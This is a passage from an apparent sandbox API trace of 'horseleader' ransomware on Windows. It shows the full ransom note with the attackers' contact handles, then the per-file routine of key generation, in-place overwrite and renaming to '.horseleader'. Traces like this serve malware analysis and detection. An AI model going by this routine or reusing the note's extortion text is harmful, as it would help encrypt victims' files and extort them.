pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\#Decrypt#.txt") returned 80 [0247.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.340] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.340] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.342] lstrlenA (lpString="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") returned 1368 [0247.342] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.342] CloseHandle (hObject=0x158) returned 1 [0247.342] GetProcessHeap () returned 0x780000 [0247.342] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.342] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66247150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="LEVEL", cAlternateFileName="")) returned 1 [0247.342] lstrcmpiW (lpString1="LEVEL", lpString2="Windows") returned -1 [0247.343] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL") returned 65 [0247.343] lstrcmpW (lpString1="LEVEL", lpString2=".") returned 1 [0247.343] lstrcmpW (lpString1="LEVEL", lpString2="..") returned 1 [0247.343] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.343] GetProcessHeap () returned 0x780000 [0247.343] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7e2960 [0247.343] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\*") returned 67 [0247.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66247150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.344] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.344] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\.") returned 67 [0247.344] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.344] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66247150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.344] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.344] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\..") returned 68 [0247.344] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.344] lstrcmpW 
(lpString1="..", lpString2="..") returned 0 [0247.344] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85f400, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa85f400, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xe2ec, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="LEVEL.ELM", cAlternateFileName="")) returned 1 [0247.345] lstrcmpiW (lpString1="LEVEL.ELM", lpString2="Windows") returned -1 [0247.345] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 75 [0247.345] StrStrIW (lpFirst="LEVEL.ELM", lpSrch=".horseleader") returned 0x0 [0247.345] lstrcmpW (lpString1="LEVEL.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.345] lstrcmpW (lpString1="LEVEL.ELM", lpString2="_uninstalling_.png") returned 1 [0247.345] lstrlenW (lpString=".testttjffg") returned 11 [0247.345] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM", lpSrch=".testttjffg") returned 0x0 [0247.345] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.345] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.345] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.348] 
lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 75 [0247.348] StrStrW (lpFirst="LEVEL.ELM", lpSrch=".txt") returned 0x0 [0247.348] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=58092) returned 1 [0247.348] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.351] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.351] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.352] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.353] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.353] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.353] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x42ec, lpOverlapped=0x0) returned 1 [0247.354] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbd14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.354] WriteFile 
(in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x42ec, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x42ec, lpOverlapped=0x0) returned 1 [0247.354] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.354] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.354] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.355] CloseHandle (hObject=0x1a4) returned 1 [0247.355] GetProcessHeap () returned 0x780000 [0247.355] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.355] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM.horseleader") returned 87 [0247.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.elm.horseleader")) returned 1 [0247.356] GetProcessHeap () returned 0x780000 [0247.356] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.356] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, 
ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x20e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="LEVEL.INF", cAlternateFileName="")) returned 1 [0247.356] lstrcmpiW (lpString1="LEVEL.INF", lpString2="Windows") returned -1 [0247.357] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 75 [0247.357] StrStrIW (lpFirst="LEVEL.INF", lpSrch=".horseleader") returned 0x0 [0247.357] lstrcmpW (lpString1="LEVEL.INF", lpString2="#Decrypt#.txt") returned 1 [0247.357] lstrcmpW (lpString1="LEVEL.INF", lpString2="_uninstalling_.png") returned 1 [0247.357] lstrlenW (lpString=".testttjffg") returned 11 [0247.357] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF", lpSrch=".testttjffg") returned 0x0 [0247.357] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.357] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.358] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 75 [0247.358] StrStrW (lpFirst="LEVEL.INF", lpSrch=".txt") returned 0x0 [0247.358] GetFileSizeEx 
(in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=526) returned 1 [0247.358] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x20e, lpOverlapped=0x0) returned 1 [0247.360] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdf2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.360] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x20e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x20e, lpOverlapped=0x0) returned 1 [0247.361] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.361] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.361] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.361] CloseHandle (hObject=0x1a4) returned 1 [0247.362] GetProcessHeap () returned 0x780000 [0247.362] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.362] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF.horseleader") returned 87 [0247.362] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\level.inf.horseleader")) returned 1 [0247.368] GetProcessHeap () returned 0x780000 [0247.368] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.368] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x563, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.369] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.369] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 77 [0247.369] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.369] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.369] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.369] lstrlenW (lpString=".testttjffg") returned 11 [0247.369] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.369] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.369] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 77 [0247.372] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.372] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1379) returned 1 [0247.372] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x563, lpOverlapped=0x0) returned 1 [0247.375] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffa9d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.375] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x563, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x563, lpOverlapped=0x0) returned 1 [0247.375] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.375] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.376] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.376] CloseHandle (hObject=0x1a4) returned 1 [0247.376] GetProcessHeap () returned 0x780000 [0247.376] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.376] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.horseleader") returned 89 [0247.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.horseleader")) returned 1 [0247.377] GetProcessHeap () returned 0x780000 [0247.377] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.377] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xbbf3, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.377] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.377] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 78 [0247.377] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.377] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.377] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.377] lstrlenW (lpString=".testttjffg") 
returned 11 [0247.377] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.377] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.377] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.378] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 78 [0247.378] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.378] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=48115) returned 1 [0247.378] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.380] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.381] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.381] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.381] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.381] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.381] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1bf3, lpOverlapped=0x0) returned 1 [0247.381] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe40d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.382] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1bf3, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 